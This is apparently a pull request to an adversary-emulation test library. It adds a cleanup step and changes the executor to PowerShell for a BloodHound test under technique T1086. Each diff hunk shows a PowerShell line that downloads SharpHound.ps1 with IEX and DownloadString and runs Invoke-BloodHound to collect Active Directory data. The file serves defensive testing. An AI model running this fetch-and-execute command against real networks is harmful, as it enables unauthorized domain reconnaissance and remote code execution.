### PR TITLE
T1086 - Added cleanup command for BloodHound Test

### DIFF
--- a/atomics/T1086/T1086.yaml
+++ b/atomics/T1086/T1086.yaml
@@ -32,10 +32,10 @@ atomic_tests:
       type: url
       default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
   executor:
-    name: command_prompt
+    name: Powershell
     elevation_required: false
     command: |
-      powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
+      IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
     cleanup_command: |
       Remove-Item $env:temp\*BloodHound.zip -Force
 

--- a/atomics/T1086/T1086.yaml
+++ b/atomics/T1086/T1086.yaml
@@ -36,6 +36,8 @@ atomic_tests:
     elevation_required: false
     command: |
       powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
+    cleanup_command: |
+      Remove-Item $env:temp\*BloodHound.zip -Force
 
 - name: Obfuscation Tests
   description: |

--- a/atomics/T1086/T1086.yaml
+++ b/atomics/T1086/T1086.yaml
@@ -32,7 +32,7 @@ atomic_tests:
       type: url
       default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
   executor:
-    name: Powershell
+    name: powershell
     elevation_required: false
     command: |
       IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound


### PR DESCRIPTION
**Details:**
<!-- Added cleanup command for BloodHound Test and changed executor to powershell. Fixed syntax for new executor-->

**Testing:**
<!-- 
OS Name:	Microsoft Windows 10 Enterprise
Version:           	10.0.18362 Build 18362
-->